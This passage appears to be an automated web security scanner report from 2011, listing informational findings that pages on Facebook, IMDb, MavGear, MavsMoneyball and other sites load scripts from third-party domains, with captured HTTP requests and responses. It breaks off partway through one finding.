19.71. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/Ou0QNrclV2b.js
http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/eptfJSfAjrr.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js

Request

Response

19.72. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js

Request

Response

19.73. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js

Request

Response

19.74. http://www.facebook.com/widgets/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/widgets/like.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/Ou0QNrclV2b.js
http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/eptfJSfAjrr.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js

Request

Response

19.75. http://www.gamershell.com/news_118846.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamershell.com
Path:	/news_118846.html

Issue detail

The response dynamically includes the following script from another domain:

http://digg.com/tools/diggthis.js

Request

GET /news_118846.html HTTP/1.1
Host: www.gamershell.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:47 GMT
Server: Apache
Cache-Control: max-age=120
Expires: Mon, 13 Jun 2011 11:24:47 GMT
Vary: Accept-Encoding
Content-Length: 22360
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...

19.76. http://www.imdb.com/images/a/ifb/google_afc_labs.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imdb.com
Path:	/images/a/ifb/google_afc_labs.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /images/a/ifb/google_afc_labs.html HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0944947/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYoMm5Fdk_phrDOi8Rq3lr0Vfkpyn_iZKlvUBXpjayFtDxQnvLUGHaI23s7AlzX-TK4cn0Z1dit92ljBzqFG5RN_fCvXzjD_K5kMcFKrMEtBsTZ60YEwroC8LIhmUNCMVa63L1rgk2rPactgSSRuYyd2sNlQetwFKDdqwvr4HFJbYxUap5z-sbkpssAp3mTxfp-3MNnFWWlXV5xO57bZcUuRlJB7H8yKBVciBLIF59N9KU0zx4NQoloE7ko_sR4L4WQXXQHOXfWcviAwTNg4TMaJxYtW1mTsFTet-OFjVnNG-OjPKdy96Tic0OnaeSI-wRmMw8DkpM51sjBe23mmsXM9g; cs=hNXsN7ESKPmtup0EZ0F8ngeBbbqgkVqM8BkNuqOCHTKzAg6JM4JeudCRXRoA0U26oKcq7CMBbbqj50iJ99HN2bCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==; session-id=431-7963916-4788795; session-id-time=1465643916

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:09 GMT
Server: Server
Last-Modified: Sun, 12 Jun 2011 05:36:17 GMT
ETag: "999-2e87f640"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Thu, 10 Jun 2021 11:24:09 GMT
nnCoection: close
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 2457

<html>
<head>

<script type="text/javascript">
var loc = document.location.toString();
var args_idx = loc.indexOf("#");
if (args_idx != -1) {
var args_str = loc.substring(args_idx + 1);

var a
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

19.77. http://www.imdb.com/images/a/ifb/pda_comm2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imdb.com
Path:	/images/a/ifb/pda_comm2.html

Issue detail

The response dynamically includes the following script from another domain:

http://g-ecx.images-amazon.com/images/G/01/pda/pda.js

Request

GET /images/a/ifb/pda_comm2.html HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://cdn-bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYoMm5Fdk_phrDOi8Rq3lr0Vfkpyn_iZKlvUBXpjayFtDxQnvLUGHaI23s7AlzX-TK4cn0Z1dit92ljBzqFG5RN_fCvXzjD_K5kMcFKrMEtBsTZ60YEwroC8LIhmUNCMVa63L1rgk2rPactgSSRuYyd2sNlQetwFKDdqwvr4HFJbYxUap5z-sbkpssAp3mTxfp-3MNnFWWlXV5xO57bZcUuRlJB7H8yKBVciBLIF59N9KU0zx4NQoloE7ko_sR4L4WQXXQHOXfWcviAwTNg4TMaJxYtW1mTsFTet-OFjVnNG-OjPKdy96Tic0OnaeSI-wRmMw8DkpM51sjBe23mmsXM9g; cs=hNXsN7ESKPmtup0EZ0F8ngeBbbqgkVqM8BkNuqOCHTKzAg6JM4JeudCRXRoA0U26oKcq7CMBbbqj50iJ99HN2bCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==; session-id=431-7963916-4788795; session-id-time=1465643916; __utmz=168836921.1307963931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168836921.1757895890.1307963931.1307963931.1307963931.1; __utmb=168836921.0.10.1307963931; __utmc=168836921; __utmv=168836921.Falkor; us=s%3D1275%3Bs%3D479%3Bs%3D1099%3Bs%3D67%3Bs%3D11%3Bs%3D939%3Bs%3D944%3Bs%3D24%3Bs%3D1320%3Bs%3D1009%3Bs%3D422%3Bs%3D32%3Bs%3D867%3Bs%3Dc3%3Bs%3Dc2%3Bs%3Dc4%3Bs%3Dc4%3Bs%3Dc1%3Bs%3Dc1%3B

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:25:56 GMT
Server: Server
Last-Modified: Sun, 12 Jun 2011 05:36:17 GMT
ETag: "69-2e87f640"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Thu, 10 Jun 2021 11:25:56 GMT
nnCoection: close
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 105

<html><body><script src="http://g-ecx.images-amazon.com/images/G/01/pda/pda.js"></script></body></html>

19.78. http://www.imdb.com/title/tt0944947/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imdb.com
Path:	/title/tt0944947/

Issue detail

The response dynamically includes the following scripts from other domains:

http://i.media-imdb.com/images/SF073d3ef3ffb46e3586a37436e7ffb2f0/js/app/falkor/ajax.js
http://i.media-imdb.com/images/SF10092eee563dec2dca82b77d2cf5a1ae/js/jquery.js
http://i.media-imdb.com/images/SF14176f459bd0474f6a0284a9c3ba61f7/a/js/beacon.js
http://i.media-imdb.com/images/SF1aaa3e422a61461adae12cf0f8ae4578/js/cc/ads.js
http://i.media-imdb.com/images/SF1b83364c8a1d6f71c79acfee1edd87be/js/clicktale-WRb6.js
http://i.media-imdb.com/images/SF1bc55d526cb484e2b1ad3ef681e954cf/js/cc/suggestionsearch.js
http://i.media-imdb.com/images/SF1dabb5dab89baaf127350c0edb1c87c0/js/app/clickstream/rvi.js
http://i.media-imdb.com/images/SF3bc94709a0ca67a4280d674b80cf653a/js/app/falkor/quicklinks.js
http://i.media-imdb.com/images/SF4f789f206c87a31b26eb8666da48322e/js/app/win7/sitemode.js
http://i.media-imdb.com/images/SF59cb8fac1cd5f8516feb6f7a35ff451d/js/app/tvgrid/tvgrid_v2.js
http://i.media-imdb.com/images/SF6aa1c2e4496f4a4ad5122e6ca372f2b2/js/navbar.js
http://i.media-imdb.com/images/SF72e1d93fddec7a7150ae9de2b334a1cd/js/jquery/plugins/jquery.appear-1.1.1.min.js
http://i.media-imdb.com/images/SF86793c35a08946b1496c39d0dbd5b6c9/js/jquery/plugins/jquery.colorbox-min.js
http://i.media-imdb.com/images/SF8ce2dec22e880d42dd87258c611fc340/js/clicktale-FetchFromWithCookies.js
http://i.media-imdb.com/images/SFbab4b9c36c6a2f5e5394cbb81ae2b98c/js/jquery/ui-current-custom.js
http://i.media-imdb.com/images/SFcc0a522af34c307df9cbd83dfaa9ecab/js/cc/watchlist.js
http://i.media-imdb.com/images/SFd4584e7d464fe4c751538fe37e9489ec/js/jquery/plugins/jquery.appear.imdb.js
http://i.media-imdb.com/images/SFd9ecfaa62b429289ac143d0519845252/js/cc/loginbox.js
http://i.media-imdb.com/images/SFe04edf8d019d53fe7b769caa32b55d71/js/cc/rating.js
http://www.google-analytics.com/ga.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:39 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: cs=i4ngtxIow2LA4IAykCSLUAc/2jlwaVoPNU3JeXR+bJ3wytldB18NKdBpWjlA4XqxAyp5KuNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=/xklkJ6UmgbIlDzGK7GnmQgOAn3+SVT9y+wjW946F35pfwPtXklU/c7BZHV9CnfubUonbp7p9+7OSVT9yK4Uvd5JVMtpSdz9/kliy+7BVP39WsR17do3vt1aZ/6NSlRdWF+Srs7fYurOSVS9XlkU3f5pVP3+SVS9vhkkzf;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=ORTpIPsfQKC0ad7UcfTa2wbpWjlwaWx+JhpqOXQuT6og+kkaN18NKdBpWjlA4Rqx4yp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=r74zZnN5GNCNLsB54oX4bA5/E6t5KVT9+eoAzo7KZ6kJfwPtXklU/c7BBHVdCnfe/Uonbp7p9+7OSVT9yK4Uvd5JVMtpSdz9/kliy+7BVP39WsR17do3vt1aZ/6NSlRdWF+Srs7fYurOSVS9XlkU3f5pVP3+SVS9vhkkzf;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=0y5MmSeCFA7tJZdckMibLwc/2jlwaVoPN88euXRfHKxQysk6918NKdBpWjlA4Tqxwyp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=Ms2AwBeH6407dvGQvS6P4gbpWjlwaWx+Ix4KOXZ6HU9Q+nkaF18NKdBpWjlA4Sqxsyp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=B9HGesm1IFjYQnDiNlEWoQYuDLlwaVo5Qyo+3HXMfg2A2tlfl18NKdBpWjlA4dqxoyp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 103898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...

<script src="http://i.media-imdb.com/images/SF1aaa3e422a61461adae12cf0f8ae4578/js/cc/ads.js" ></script>
...[SNIP]...
</div>
<script src="http://i.media-imdb.com/images/SF10092eee563dec2dca82b77d2cf5a1ae/js/jquery.js" ></script><script src="http://i.media-imdb.com/images/SFbab4b9c36c6a2f5e5394cbb81ae2b98c/js/jquery/ui-current-custom.js" ></script><script src="http://i.media-imdb.com/images/SF72e1d93fddec7a7150ae9de2b334a1cd/js/jquery/plugins/jquery.appear-1.1.1.min.js" ></script><script src="http://i.media-imdb.com/images/SFd4584e7d464fe4c751538fe37e9489ec/js/jquery/plugins/jquery.appear.imdb.js" ></script><script src="http://i.media-imdb.com/images/SF073d3ef3ffb46e3586a37436e7ffb2f0/js/app/falkor/ajax.js" ></script><script src="http://i.media-imdb.com/images/SF3bc94709a0ca67a4280d674b80cf653a/js/app/falkor/quicklinks.js" ></script>
...[SNIP]...
</div>
<script src="http://i.media-imdb.com/images/SF1b83364c8a1d6f71c79acfee1edd87be/js/clicktale-WRb6.js" type="text/javascript"></script>
<script type="text/javascript" src="http://i.media-imdb.com/images/SF8ce2dec22e880d42dd87258c611fc340/js/clicktale-FetchFromWithCookies.js"></script>
...[SNIP]...
</script>
<script src="http://i.media-imdb.com/images/SF4f789f206c87a31b26eb8666da48322e/js/app/win7/sitemode.js" ></script>
...[SNIP]...
</script><script src="http://i.media-imdb.com/images/SF86793c35a08946b1496c39d0dbd5b6c9/js/jquery/plugins/jquery.colorbox-min.js" ></script>
...[SNIP]...
</script>
<script src="http://i.media-imdb.com/images/SFd9ecfaa62b429289ac143d0519845252/js/cc/loginbox.js" ></script><script src="http://i.media-imdb.com/images/SF6aa1c2e4496f4a4ad5122e6ca372f2b2/js/navbar.js" ></script><script src="http://i.media-imdb.com/images/SF1bc55d526cb484e2b1ad3ef681e954cf/js/cc/suggestionsearch.js" charset="UTF-8"></script><script src="http://i.media-imdb.com/images/SFe04edf8d019d53fe7b769caa32b55d71/js/cc/rating.js" ></script>
...[SNIP]...
</script><script src="http://i.media-imdb.com/images/SFcc0a522af34c307df9cbd83dfaa9ecab/js/cc/watchlist.js" ></script>
...[SNIP]...
</script><script src="http://i.media-imdb.com/images/SF59cb8fac1cd5f8516feb6f7a35ff451d/js/app/tvgrid/tvgrid_v2.js" ></script><script src="http://i.media-imdb.com/images/SF1dabb5dab89baaf127350c0edb1c87c0/js/app/clickstream/rvi.js" ></script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...
</script>
<script src="http://i.media-imdb.com/images/SF14176f459bd0474f6a0284a9c3ba61f7/a/js/beacon.js" ></script>
...[SNIP]...

19.79. http://www.imdb.com/title/tt0944947/_ajax/footer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imdb.com
Path:	/title/tt0944947/_ajax/footer

Issue detail

The response dynamically includes the following scripts from other domains:

http://i.media-imdb.com/images/SF207ebab053149f37d10ce21d602b87f5/js/app/feedback/page_feedback.js
http://i.media-imdb.com/images/SFd4584e7d464fe4c751538fe37e9489ec/js/jquery/plugins/jquery.appear.imdb.js

Request

GET /title/tt0944947/_ajax/footer HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0944947/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYoMm5Fdk_phrDOi8Rq3lr0Vfkpyn_iZKlvUBXpjayFtDxQnvLUGHaI23s7AlzX-TK4cn0Z1dit92ljBzqFG5RN_fCvXzjD_K5kMcFKrMEtBsTZ60YEwroC8LIhmUNCMVa63L1rgk2rPactgSSRuYyd2sNlQetwFKDdqwvr4HFJbYxUap5z-sbkpssAp3mTxfp-3MNnFWWlXV5xO57bZcUuRlJB7H8yKBVciBLIF59N9KU0zx4NQoloE7ko_sR4L4WQXXQHOXfWcviAwTNg4TMaJxYtW1mTsFTet-OFjVnNG-OjPKdy96Tic0OnaeSI-wRmMw8DkpM51sjBe23mmsXM9g; cs=hNXsN7ESKPmtup0EZ0F8ngeBbbqgkVqM8BkNuqOCHTKzAg6JM4JeudCRXRoA0U26oKcq7CMBbbqj50iJ99HN2bCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==; session-id=431-7963916-4788795; session-id-time=1465643916; __utmz=168836921.1307963931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168836921.1757895890.1307963931.1307963931.1307963931.1; __utmb=168836921.0.10.1307963931; __utmc=168836921; __utmv=168836921.Falkor; us=s%3D1275%3Bs%3D479%3Bs%3D1099%3Bs%3D67%3Bs%3D11%3Bs%3D939%3Bs%3D944%3Bs%3D24%3Bs%3D1320%3Bs%3D1009%3Bs%3D422%3Bs%3D32%3Bs%3D867%3Bs%3Dc3%3Bs%3Dc2%3Bs%3Dc4%3Bs%3Dc4%3Bs%3Dc1%3Bs%3Dc1%3B

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:25:28 GMT
Server: Server
Cache-Control: private
nnCoection: close
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 23586

<div class="article" >

<h2>Frequently Asked Questions</h2>

<a onclick="(new Image()).src='/rg/title-tease/faq-empty/images/b.gif?link=%2Ftitle%2Ftt0944947%2Ffaq';" href="/title/tt
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://i.media-imdb.com/images/SF558ae863f476a6a474e9c249aef04109/css2/app/feedback/page_feedback.css" ><script src="http://i.media-imdb.com/images/SFd4584e7d464fe4c751538fe37e9489ec/js/jquery/plugins/jquery.appear.imdb.js" ></script><script src="http://i.media-imdb.com/images/SF207ebab053149f37d10ce21d602b87f5/js/app/feedback/page_feedback.js" ></script>

19.80. http://www.mavgear.com/Dallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavgear.com
Path:	/Dallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /Dallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html HTTP/1.1
Host: www.mavgear.com
Proxy-Connection: keep-alive
Referer: http://www.mavgear.com/?utm_campaign=finals&utm_medium=splash&utm_source=mavsdotcom&utm_content=champs&utm_term=mavgear
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RefererCookie=http%3A%2F%2Fwww.nba.com%2Fmavericks%2Fplayoffs%2F2011_nba_finals_champions.html; store_language=en; __utmz=139702319.1307963468.1.1.utmcsr=mavsdotcom|utmccn=finals|utmcmd=splash|utmctr=mavgear|utmcct=champs; __utma=139702319.829534563.1307963468.1307963468.1307963468.1; __utmc=139702319; __utmb=139702319.1.10.1307963468; xid=612450a171f9b2a6cb69ac0fcabd6f82

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:41 GMT
Server: Apache/2.2.17 (Atomic)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:20:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NON CURa ADMa DEVa TAIa CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: xid=612450a171f9b2a6cb69ac0fcabd6f82; path=/; domain=www.mavgear.com; httponly
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 57842

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4bba00a22396c773"></script>
...[SNIP]...

19.81. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js
http://edge.quantserve.com/quant.js
http://ox-d.sbnation.com/w/1.0/jstag
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1
http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=59082566

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:01:19 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Mon, 13 Jun 2011 10:57:40 GMT
ETag: "140008-1efa8e-4a595c9be60ed"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2030222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
</title>

<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=59082566"></script>
...[SNIP]...
</style>

<script src="http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js" type="text/javascript"></script>
<script type="text/javascript" src="http://ox-d.sbnation.com/w/1.0/jstag"></script>
...[SNIP]...
<span style="float:right; margin-top:-1px;">

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</fb:send>

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1">
</script>
...[SNIP]...

<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.82. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js
http://edge.quantserve.com/quant.js
http://ox-d.sbnation.com/w/1.0/jstag
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1
http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=88963369

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:05:48 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Mon, 13 Jun 2011 11:03:04 GMT
ETag: "460006-1efa41-4a595dd178e95"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2030145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
</title>

<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=88963369"></script>
...[SNIP]...
</style>

<script src="http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js" type="text/javascript"></script>
<script type="text/javascript" src="http://ox-d.sbnation.com/w/1.0/jstag"></script>
...[SNIP]...
<span style="float:right; margin-top:-1px;">

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</fb:send>

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1">
</script>
...[SNIP]...

<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.83. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/3/2205973/a-message-from-the-rest-of-us

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn3.sbnation.com/javascripts/universal.v09f48c1de658449c.js
http://edge.quantserve.com/quant.js
http://ox-d.sbnation.com/w/1.0/jstag
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://s26.sitemeter.com/js/counter.js?site=s26mavsmoneyball&ocd=1
http://www.sbnation.com/sso/initiate_auto_login?community_id=38&rand=49572700

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:58 GMT
Server: Mongrel 1.1.5
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
